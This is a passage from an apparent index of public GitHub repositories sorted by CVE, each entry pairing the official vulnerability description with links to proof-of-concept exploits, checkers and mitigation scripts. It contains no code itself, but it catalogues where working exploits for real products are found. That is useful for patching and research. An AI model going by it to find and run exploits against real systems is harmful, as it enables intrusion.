- [ahlfors/CVE-2024-6387](https://github.com/ahlfors/CVE-2024-6387)
- [Mufti22/CVE-2024-6387-checkher](https://github.com/Mufti22/CVE-2024-6387-checkher)
- [thegenetic/CVE-2024-6387-exploit](https://github.com/thegenetic/CVE-2024-6387-exploit)
- [R4Tw1z/CVE-2024-6387](https://github.com/R4Tw1z/CVE-2024-6387)
- [d0rb/CVE-2024-6387](https://github.com/d0rb/CVE-2024-6387)
- [CiderAndWhisky/regression-scanner](https://github.com/CiderAndWhisky/regression-scanner)
- [shamo0/CVE-2024-6387_PoC](https://github.com/shamo0/CVE-2024-6387_PoC)
- [paradessia/CVE-2024-6387-nmap](https://github.com/paradessia/CVE-2024-6387-nmap)
- [SecWithMoh/CVE-2024-6387](https://github.com/SecWithMoh/CVE-2024-6387)
- [PrincipalAnthony/CVE-2024-6387-Updated-x64bit](https://github.com/PrincipalAnthony/CVE-2024-6387-Updated-x64bit)
- [k4t3pr0/CVE-2024-6387-POC](https://github.com/k4t3pr0/CVE-2024-6387-POC)
- [daniel-odrinski/CVE-2024-6387-Mitigation-Ansible-Playbook](https://github.com/daniel-odrinski/CVE-2024-6387-Mitigation-Ansible-Playbook)
- [rumochnaya/openssh-cve-2024-6387.sh](https://github.com/rumochnaya/openssh-cve-2024-6387.sh)
- [zenzue/CVE-2024-6387-Mitigation](https://github.com/zenzue/CVE-2024-6387-Mitigation)
- [devarshishimpi/CVE-2024-6387-Check](https://github.com/devarshishimpi/CVE-2024-6387-Check)
- [hssmo/cve-2024-6387_AImade](https://github.com/hssmo/cve-2024-6387_AImade)
- [ACHUX21/checker-CVE-2024-6387](https://github.com/ACHUX21/checker-CVE-2024-6387)
- [AiGptCode/ssh_exploiter_CVE-2024-6387](https://github.com/AiGptCode/ssh_exploiter_CVE-2024-6387)
- [xristos8574/regreSSHion-nmap-scanner](https://github.com/xristos8574/regreSSHion-nmap-scanner)
- [xonoxitron/regreSSHion](https://github.com/xonoxitron/regreSSHion)
- [no-one-sec/CVE-2024-6387](https://github.com/no-one-sec/CVE-2024-6387)
- [dawnl3ss/CVE-2024-6387](https://github.com/dawnl3ss/CVE-2024-6387)
- [MrR0b0t19/CVE-2024-6387-Exploit-POC](https://github.com/MrR0b0t19/CVE-2024-6387-Exploit-POC)
- [th3gokul/CVE-2024-6387](https://github.com/th3gokul/CVE-2024-6387)
- [n1cks0n/Test_CVE-2024-6387](https://github.com/n1cks0n/Test_CVE-2024-6387)
- [l0n3m4n/CVE-2024-6387](https://github.com/l0n3m4n/CVE-2024-6387)
- [RickGeex/CVE-2024-6387-Checker](https://github.com/RickGeex/CVE-2024-6387-Checker)
- [xonoxitron/regreSSHion-checker](https://github.com/xonoxitron/regreSSHion-checker)
- [BrandonLynch2402/cve-2024-6387-nuclei-template](https://github.com/BrandonLynch2402/cve-2024-6387-nuclei-template)
- [edsonjt81/CVE-2024-6387_Check](https://github.com/edsonjt81/CVE-2024-6387_Check)
- [grupooruss/CVE-2024-6387](https://github.com/grupooruss/CVE-2024-6387)
- [CognisysGroup/CVE-2024-6387-Checker](https://github.com/CognisysGroup/CVE-2024-6387-Checker)
- [sxlmnwb/CVE-2024-6387](https://github.com/sxlmnwb/CVE-2024-6387)
- [Symbolexe/CVE-2024-6387](https://github.com/Symbolexe/CVE-2024-6387)
- [harshinsecurity/sentinelssh](https://github.com/harshinsecurity/sentinelssh)
- [t3rry327/cve-2024-6387-poc](https://github.com/t3rry327/cve-2024-6387-poc)
- [jocker2410/CVE-2024-6387_poc](https://github.com/jocker2410/CVE-2024-6387_poc)
- [liqhtnd/sshd-logingracetime0](https://github.com/liqhtnd/sshd-logingracetime0)
- [JackSparrowhk/ssh-CVE-2024-6387-poc](https://github.com/JackSparrowhk/ssh-CVE-2024-6387-poc)
- [turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker](https://github.com/turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker)
- [sms2056/CVE-2024-6387](https://github.com/sms2056/CVE-2024-6387)
- [invaderslabs/regreSSHion-CVE-2024-6387-](https://github.com/invaderslabs/regreSSHion-CVE-2024-6387-)
- [lala-amber/CVE-2024-6387](https://github.com/lala-amber/CVE-2024-6387)
- [4lxprime/regreSSHive](https://github.com/4lxprime/regreSSHive)
- [sardine-web/CVE-2024-6387_Check](https://github.com/sardine-web/CVE-2024-6387_Check)
- [0x4D31/cve-2024-6387_hassh](https://github.com/0x4D31/cve-2024-6387_hassh)
- [sardine-web/CVE-2024-6387-template](https://github.com/sardine-web/CVE-2024-6387-template)
- [imv7/CVE-2024-6387](https://github.com/imv7/CVE-2024-6387)
- [SiberianHacker/CVE-2024-6387-Finder](https://github.com/SiberianHacker/CVE-2024-6387-Finder)
- [dgicloud/patch_regreSSHion](https://github.com/dgicloud/patch_regreSSHion)
- [azurejoga/CVE-2024-6387-how-to-fix](https://github.com/azurejoga/CVE-2024-6387-how-to-fix)
- [asterictnl-lvdw/CVE-2024-6387](https://github.com/asterictnl-lvdw/CVE-2024-6387)
- [vkaushik-chef/regreSSHion](https://github.com/vkaushik-chef/regreSSHion)
- [dgourillon/mitigate-CVE-2024-6387](https://github.com/dgourillon/mitigate-CVE-2024-6387)
- [mrmtwoj/CVE-2024-6387](https://github.com/mrmtwoj/CVE-2024-6387)
- [filipi86/CVE-2024-6387-Vulnerability-Checker](https://github.com/filipi86/CVE-2024-6387-Vulnerability-Checker)
- [kubota/CVE-2024-6387-Vulnerability-Checker](https://github.com/kubota/CVE-2024-6387-Vulnerability-Checker)
- [DimaMend/cve-2024-6387-poc](https://github.com/DimaMend/cve-2024-6387-poc)
- [ThemeHackers/CVE-2024-6387](https://github.com/ThemeHackers/CVE-2024-6387)
- [Sibijo/mitigate_ssh](https://github.com/Sibijo/mitigate_ssh)
- [Passyed/regreSSHion-Fix](https://github.com/Passyed/regreSSHion-Fix)
- [k4t3pr0/CVE-2024-6387-Check](https://github.com/k4t3pr0/CVE-2024-6387-Check)
- [dream434/CVE-2024-6387](https://github.com/dream434/CVE-2024-6387)
- [ThatNotEasy/CVE-2024-6387](https://github.com/ThatNotEasy/CVE-2024-6387)
- [prelearn-code/CVE-2024-6387](https://github.com/prelearn-code/CVE-2024-6387)
- [l-urk/CVE-2024-6387](https://github.com/l-urk/CVE-2024-6387)
- [alex14324/ssh_poc2024](https://github.com/alex14324/ssh_poc2024)
- [X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker](https://github.com/X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker)
- [s1d6point7bugcrowd/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH](https://github.com/s1d6point7bugcrowd/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH)
- [almogopp/OpenSSH-CVE-2024-6387-Fix](https://github.com/almogopp/OpenSSH-CVE-2024-6387-Fix)
- [HadesNull123/CVE-2024-6387_Check](https://github.com/HadesNull123/CVE-2024-6387_Check)
- [identity-threat-labs/CVE-2024-6387-Vulnerability-Checker](https://github.com/identity-threat-labs/CVE-2024-6387-Vulnerability-Checker)
- [identity-threat-labs/Article-RegreSSHion-CVE-2024-6387](https://github.com/identity-threat-labs/Article-RegreSSHion-CVE-2024-6387)
### CVE-2024-6529 (2024-08-01)
The Ultimate Classified Listings WordPress plugin before 1.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
- [Abdurahmon3236/CVE-2024-6529](https://github.com/Abdurahmon3236/CVE-2024-6529)
### CVE-2024-6536 (2024-07-30)
The Zephyr Project Manager WordPress plugin before 3.3.99 does not sanitise and escape some of its settings, which could allow high privilege users such as editors and admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
- [apena-ba/CVE-2024-6536](https://github.com/apena-ba/CVE-2024-6536)
### CVE-2024-6592
- [RedTeamPentesting/watchguard-sso-client](https://github.com/RedTeamPentesting/watchguard-sso-client)
### CVE-2024-6624 (2024-07-11)
The JSON API User plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.9.3. This is due to improper controls on custom user meta fields. This makes it possible for unauthenticated attackers to register as administrators on the site. The plugin requires the JSON API plugin to also be installed.
- [RandomRobbieBF/CVE-2024-6624](https://github.com/RandomRobbieBF/CVE-2024-6624)
### CVE-2024-6670 (2024-08-29)
In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
- [sinsinology/CVE-2024-6670](https://github.com/sinsinology/CVE-2024-6670)
### CVE-2024-6768 (2024-08-12)
A Denial of Service in CLFS.sys in Microsoft Windows 10, Windows 11, Windows Server 2016, Windows Server 2019, and Windows Server 2022 allows a malicious authenticated low-privilege user to cause a Blue Screen of Death via a forced call to the KeBugCheckEx function.
- [fortra/CVE-2024-6768](https://github.com/fortra/CVE-2024-6768)
### CVE-2024-6769
- [fortra/CVE-2024-6769](https://github.com/fortra/CVE-2024-6769)
### CVE-2024-6778 (2024-07-16)
Race in DevTools in Google Chrome prior to 126.0.6478.182 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: High)
- [ading2210/CVE-2024-6778-POC](https://github.com/ading2210/CVE-2024-6778-POC)
- [r00tjunip3r1/POC-CVE-2024-6778](https://github.com/r00tjunip3r1/POC-CVE-2024-6778)
### CVE-2024-6782 (2024-08-06)
Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution.
- [zangjiahe/CVE-2024-6782](https://github.com/zangjiahe/CVE-2024-6782)
- [jdpsl/CVE-2024-6782](https://github.com/jdpsl/CVE-2024-6782)
- [R4idB0Y/CVE-2024-6782-PoC](https://github.com/R4idB0Y/CVE-2024-6782-PoC)
### CVE-2024-6788 (2024-08-13)
A remote unauthenticated attacker can use the firmware update feature on the LAN interface of the device to reset the password for the predefined, low-privileged user “user-app” to the default password.
- [zetraxz/CVE-2024-6788](https://github.com/zetraxz/CVE-2024-6788)
### CVE-2024-7029 (2024-08-02)
Commands can be injected over the network and executed without authentication.
- [bigherocenter/CVE-2024-7029-EXPLOIT](https://github.com/bigherocenter/CVE-2024-7029-EXPLOIT)
- [ebrasha/CVE-2024-7029](https://github.com/ebrasha/CVE-2024-7029)
- [geniuszlyy/CVE-2024-7029](https://github.com/geniuszlyy/CVE-2024-7029)
### CVE-2024-7094 (2024-08-13)
The JS Help Desk – The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.8.6 via the 'storeTheme' function. This is due to a lack of sanitization on user-supplied values, which replace values in the style.php file, along with missing capability checks. This makes it possible for unauthenticated attackers to execute code on the server. This issue was partially patched in 2.8.6 when the code injection issue was resolved, and fully patched in 2.8.7 when the missing authorization and cross-site request forgery protection was added.
- [nastar-id/CVE-2024-7094](https://github.com/nastar-id/CVE-2024-7094)
### CVE-2024-7120 (2024-07-26)
Es wurde eine kritische Schwachstelle in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 gefunden. Hiervon betroffen ist ein unbekannter Codeblock der Datei list_base_config.php der Komponente Web Interface. Durch die Manipulation des Arguments template mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung.
- [fa-rrel/CVE-2024-7120](https://github.com/fa-rrel/CVE-2024-7120)
### CVE-2024-7135 (2024-07-31)
The Tainacan plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_file' function in all versions up to, and including, 0.21.7. The function is also vulnerable to directory traversal. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
- [RandomRobbieBF/CVE-2024-7135](https://github.com/RandomRobbieBF/CVE-2024-7135)
### CVE-2024-7313 (2024-08-26)
The Shield Security WordPress plugin before 20.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
- [Wayne-Ker/CVE-2024-7313](https://github.com/Wayne-Ker/CVE-2024-7313)
### CVE-2024-7339 (2024-08-01)
In TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T wurde eine problematische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei /queryDevInfo. Dank der Manipulation mit unbekannten Daten kann eine information disclosure-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [RevoltSecurities/CVE-2024-7339](https://github.com/RevoltSecurities/CVE-2024-7339)
### CVE-2024-7479
- [PeterGabaldon/CVE-2024-7479_CVE-2024-7481](https://github.com/PeterGabaldon/CVE-2024-7479_CVE-2024-7481)
### CVE-2024-7514
- [RandomRobbieBF/CVE-2024-7514](https://github.com/RandomRobbieBF/CVE-2024-7514)
### CVE-2024-7593 (2024-08-13)
Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.
- [rxerium/CVE-2024-7593](https://github.com/rxerium/CVE-2024-7593)
- [D3N14LD15K/CVE-2024-7593_PoC_Exploit](https://github.com/D3N14LD15K/CVE-2024-7593_PoC_Exploit)
- [skyrowalker/CVE-2024-7593](https://github.com/skyrowalker/CVE-2024-7593)
### CVE-2024-7646 (2024-08-16)
A security issue was discovered in ingress-nginx where an actor with permission to create Ingress objects (in the `networking.k8s.io` or `extensions` API group) can bypass annotation validation to inject arbitrary commands and obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.
- [r0binak/CVE-2024-7646](https://github.com/r0binak/CVE-2024-7646)
- [dovics/cve-2024-7646](https://github.com/dovics/cve-2024-7646)
### CVE-2024-7703 (2024-08-17)
The ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.0.37 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
- [lfillaz/CVE-2024-7703](https://github.com/lfillaz/CVE-2024-7703)
### CVE-2024-7854 (2024-08-21)
The Woo Inquiry plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 0.1 due to insufficient escaping on the user supplied parameter 'dbid' and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [RandomRobbieBF/CVE-2024-7854](https://github.com/RandomRobbieBF/CVE-2024-7854)
### CVE-2024-7856 (2024-08-29)
The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to unauthorized arbitrary file deletion due to a missing capability check on the removeTempFiles() function and insufficient path validation on the 'file' parameter in all versions up to, and including, 5.7.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files which can make remote code execution possible when wp-config.php is deleted.
- [l8BL/CVE-2024-7856](https://github.com/l8BL/CVE-2024-7856)
### CVE-2024-7928 (2024-08-19)
Eine problematische Schwachstelle wurde in FastAdmin bis 1.3.3.20220121 entdeckt. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei /index/ajax/lang. Durch Manipulation des Arguments lang mit unbekannten Daten kann eine path traversal-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.3.4.20220530 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
- [bigb0x/CVE-2024-7928](https://github.com/bigb0x/CVE-2024-7928)
- [fa-rrel/CVE-2024-7928](https://github.com/fa-rrel/CVE-2024-7928)
- [wh6amiGit/CVE-2024-7928](https://github.com/wh6amiGit/CVE-2024-7928)
- [th3gokul/CVE-2024-7928](https://github.com/th3gokul/CVE-2024-7928)
### CVE-2024-7954 (2024-08-23)
The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.
- [Chocapikk/CVE-2024-7954](https://github.com/Chocapikk/CVE-2024-7954)
- [bigb0x/CVE-2024-7954](https://github.com/bigb0x/CVE-2024-7954)
- [fa-rrel/CVE-2024-7954-RCE](https://github.com/fa-rrel/CVE-2024-7954-RCE)
- [TheCyberguy-17/RCE_CVE-2024-7954](https://github.com/TheCyberguy-17/RCE_CVE-2024-7954)
- [MuhammadWaseem29/RCE-CVE-2024-7954](https://github.com/MuhammadWaseem29/RCE-CVE-2024-7954)
### CVE-2024-7965 (2024-08-21)
Inappropriate implementation in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
- [bi-zone/CVE-2024-7965](https://github.com/bi-zone/CVE-2024-7965)
### CVE-2024-8190 (2024-09-10)
An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.
- [horizon3ai/CVE-2024-8190](https://github.com/horizon3ai/CVE-2024-8190)
### CVE-2024-8275
- [p33d/CVE-2024-8275](https://github.com/p33d/CVE-2024-8275)
### CVE-2024-8277 (2024-09-11)
The WooCommerce Photo Reviews Premium plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.3.13.2. This is due to the plugin not properly validating what user transient is being used in the login() function and not properly verifying the user's identity. This makes it possible for unauthenticated attackers to log in as user that has dismissed an admin notice in the past 30 days, which is often an administrator. Alternatively, a user can log in as any user with any transient that has a valid user_id as the value, though it would be more difficult to exploit this successfully.
- [PolatBey/CVE-2024-8277](https://github.com/PolatBey/CVE-2024-8277)
### CVE-2024-8349
- [karlemilnikka/CVE-2024-8349-and-CVE-2024-8350](https://github.com/karlemilnikka/CVE-2024-8349-and-CVE-2024-8350)
### CVE-2024-8353
- [EQSTLab/CVE-2024-8353](https://github.com/EQSTLab/CVE-2024-8353)
### CVE-2024-8484
- [RandomRobbieBF/CVE-2024-8484](https://github.com/RandomRobbieBF/CVE-2024-8484)
### CVE-2024-8504 (2024-09-10)
An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.
- [Chocapikk/CVE-2024-8504](https://github.com/Chocapikk/CVE-2024-8504)
- [havokzero/ViciDial](https://github.com/havokzero/ViciDial)
### CVE-2024-8517 (2024-09-06)
SPIP before 4.3.2, 4.2.16, and \n4.1.18 is vulnerable to a command injection issue. A \nremote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
- [Chocapikk/CVE-2024-8517](https://github.com/Chocapikk/CVE-2024-8517)
### CVE-2024-8522 (2024-09-12)
The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [Avento/CVE-2024-8522](https://github.com/Avento/CVE-2024-8522)
### CVE-2024-8529 (2024-09-12)
The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the /wp-json/lp/v1/courses/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [RandomRobbieBF/CVE-2024-8529](https://github.com/RandomRobbieBF/CVE-2024-8529)
### CVE-2024-8698
- [huydoppaz/CVE-2024-8698-POC](https://github.com/huydoppaz/CVE-2024-8698-POC)
### CVE-2024-8752 (2024-09-16)
The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.
- [D3anSPGDMS/CVE-2024-8752](https://github.com/D3anSPGDMS/CVE-2024-8752)
### CVE-2024-8868 (2024-09-15)
Eine Schwachstelle wurde in code-projects Crud Operation System 1.0 ausgemacht. Sie wurde als kritisch eingestuft. Davon betroffen ist unbekannter Code der Datei savedata.php. Durch Manipulieren des Arguments sname mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [M0onc/CVE-2024-8868](https://github.com/M0onc/CVE-2024-8868)
### CVE-2024-8949
- [fa-rrel/CVE-2024-8949-POC](https://github.com/fa-rrel/CVE-2024-8949-POC)
### CVE-2024-9014
- [EQSTLab/CVE-2024-9014](https://github.com/EQSTLab/CVE-2024-9014)
### CVE-2024-9061
- [RandomRobbieBF/CVE-2024-9061](https://github.com/RandomRobbieBF/CVE-2024-9061)
### CVE-2024-9106
- [RandomRobbieBF/CVE-2024-9106](https://github.com/RandomRobbieBF/CVE-2024-9106)
### CVE-2024-9162
- [d0n601/CVE-2024-9162](https://github.com/d0n601/CVE-2024-9162)
### CVE-2024-9166
- [Andrysqui/CVE-2024-9166](https://github.com/Andrysqui/CVE-2024-9166)
### CVE-2024-9224
- [RandomRobbieBF/CVE-2024-9224](https://github.com/RandomRobbieBF/CVE-2024-9224)
### CVE-2024-9234
- [RandomRobbieBF/CVE-2024-9234](https://github.com/RandomRobbieBF/CVE-2024-9234)
### CVE-2024-9264
- [nollium/CVE-2024-9264](https://github.com/nollium/CVE-2024-9264)
- [z3k0sec/File-Read-CVE-2024-9264](https://github.com/z3k0sec/File-Read-CVE-2024-9264)
- [zgimszhd61/CVE-2024-9264](https://github.com/zgimszhd61/CVE-2024-9264)
- [z3k0sec/CVE-2024-9264-RCE-Exploit](https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit)
- [PunitTailor55/Grafana-CVE-2024-9264](https://github.com/PunitTailor55/Grafana-CVE-2024-9264)
- [zgimszhd61/CVE-2024-9264-RCE](https://github.com/zgimszhd61/CVE-2024-9264-RCE)
### CVE-2024-9441
- [adhikara13/CVE-2024-9441](https://github.com/adhikara13/CVE-2024-9441)
- [p33d/CVE-2024-9441](https://github.com/p33d/CVE-2024-9441)
### CVE-2024-9464
- [horizon3ai/CVE-2024-9464](https://github.com/horizon3ai/CVE-2024-9464)
### CVE-2024-9465
- [horizon3ai/CVE-2024-9465](https://github.com/horizon3ai/CVE-2024-9465)
- [mustafaakalin/CVE-2024-9465](https://github.com/mustafaakalin/CVE-2024-9465)
### CVE-2024-9466
- [holypryx/CVE-2024-9466](https://github.com/holypryx/CVE-2024-9466)
### CVE-2024-9570
- [dylvie/CVE-2024-9570_D-Link-DIR-619L-bof](https://github.com/dylvie/CVE-2024-9570_D-Link-DIR-619L-bof)
### CVE-2024-9593
- [RandomRobbieBF/CVE-2024-9593](https://github.com/RandomRobbieBF/CVE-2024-9593)
### CVE-2024-9680
- [tdonaworth/Firefox-CVE-2024-9680](https://github.com/tdonaworth/Firefox-CVE-2024-9680)
### CVE-2024-9707
- [RandomRobbieBF/CVE-2024-9707](https://github.com/RandomRobbieBF/CVE-2024-9707)
### CVE-2024-9796
- [RandomRobbieBF/CVE-2024-9796](https://github.com/RandomRobbieBF/CVE-2024-9796)
### CVE-2024-9821
- [RandomRobbieBF/CVE-2024-9821](https://github.com/RandomRobbieBF/CVE-2024-9821)
### CVE-2024-9954
- [zetraxz/CVE-2024-9954](https://github.com/zetraxz/CVE-2024-9954)
- [famixcm/CVE-2024-9954](https://github.com/famixcm/CVE-2024-9954)
### CVE-2024-9955
- [amfg145/CVE-2024-9955-POC](https://github.com/amfg145/CVE-2024-9955-POC)
- [ShawtyTwo/CVE-2024-9955-POC](https://github.com/ShawtyTwo/CVE-2024-9955-POC)
### CVE-2024-10140
- [holypryx/CVE-2024-10140](https://github.com/holypryx/CVE-2024-10140)
### CVE-2024-10354
- [K1nako0/CVE-2024-10354](https://github.com/K1nako0/CVE-2024-10354)
### CVE-2024-10355
- [K1nako0/CVE-2024-10355](https://github.com/K1nako0/CVE-2024-10355)
### CVE-2024-10410
- [K1nako0/CVE-2024-10410](https://github.com/K1nako0/CVE-2024-10410)
### CVE-2024-10448
- [bevennyamande/CVE-2024-10448](https://github.com/bevennyamande/CVE-2024-10448)
### CVE-2024-10557
- [bevennyamande/CVE-2024-10557](https://github.com/bevennyamande/CVE-2024-10557)
### CVE-2024-12883
- [mhtsec/cve-2024-12883](https://github.com/mhtsec/cve-2024-12883)
### CVE-2024-20017 (2024-03-04)
In wlan service, there is a possible out of bounds write due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation Patch ID: WCNCR00350938; Issue ID: MSV-1132.
- [mellow-hype/cve-2024-20017](https://github.com/mellow-hype/cve-2024-20017)
### CVE-2024-20291 (2024-02-28)
A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device.\r\n\r This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces.
- [Instructor-Team8/CVE-2024-20291-POC](https://github.com/Instructor-Team8/CVE-2024-20291-POC)
### CVE-2024-20338 (2024-03-06)
A vulnerability in the ISE Posture (System Scan) module of Cisco Secure Client for Linux could allow an authenticated, local attacker to elevate privileges on an affected device.\r\n\r This vulnerability is due to the use of an uncontrolled search path element. An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process. A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges.
- [annmuor/CVE-2024-20338](https://github.com/annmuor/CVE-2024-20338)
### CVE-2024-20356 (2024-04-24)
A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker with Administrator-level privileges to perform command injection attacks on an affected system and elevate their privileges to root. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of the affected software. A successful exploit could allow the attacker to elevate their privileges to root.
- [nettitude/CVE-2024-20356](https://github.com/nettitude/CVE-2024-20356)
- [SherllyNeo/CVE_2024_20356](https://github.com/SherllyNeo/CVE_2024_20356)
### CVE-2024-20404 (2024-06-05)
A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct an SSRF attack on an affected system.\r\n\r This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected system. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to obtain limited sensitive information for services that are associated to the affected device.
- [AbdElRahmanEzzat1995/CVE-2024-20404](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20404)
### CVE-2024-20405 (2024-06-05)
A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a stored XSS attack by exploiting an RFI vulnerability. \r\n\r This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive information on the affected device.
- [AbdElRahmanEzzat1995/CVE-2024-20405](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20405)
### CVE-2024-20467
- [saler-cve/PoC-Exploit-CVE-2024-20467](https://github.com/saler-cve/PoC-Exploit-CVE-2024-20467)
### CVE-2024-20656 (2024-01-09)
Visual Studio Elevation of Privilege Vulnerability
- [Wh04m1001/CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656)
### CVE-2024-20666 (2024-01-09)
BitLocker Security Feature Bypass Vulnerability
- [nnotwen/Script-For-CVE-2024-20666](https://github.com/nnotwen/Script-For-CVE-2024-20666)
- [invaderslabs/CVE-2024-20666](https://github.com/invaderslabs/CVE-2024-20666)
### CVE-2024-20696 (2024-01-09)
Windows libarchive Remote Code Execution Vulnerability
- [clearbluejar/CVE-2024-20696](https://github.com/clearbluejar/CVE-2024-20696)
### CVE-2024-20698 (2024-01-09)
Windows Kernel Elevation of Privilege Vulnerability
- [RomanRybachek/CVE-2024-20698](https://github.com/RomanRybachek/CVE-2024-20698)
### CVE-2024-20746 (2024-03-18)
Premiere Pro versions 24.1, 23.6.2 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
- [200101WhoAmI/CVE-2024-20746](https://github.com/200101WhoAmI/CVE-2024-20746)
### CVE-2024-20767 (2024-03-18)
ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
- [yoryio/CVE-2024-20767](https://github.com/yoryio/CVE-2024-20767)
- [m-cetin/CVE-2024-20767](https://github.com/m-cetin/CVE-2024-20767)
- [Chocapikk/CVE-2024-20767](https://github.com/Chocapikk/CVE-2024-20767)
- [Praison001/CVE-2024-20767-Adobe-ColdFusion](https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion)
### CVE-2024-20931 (2024-02-17)
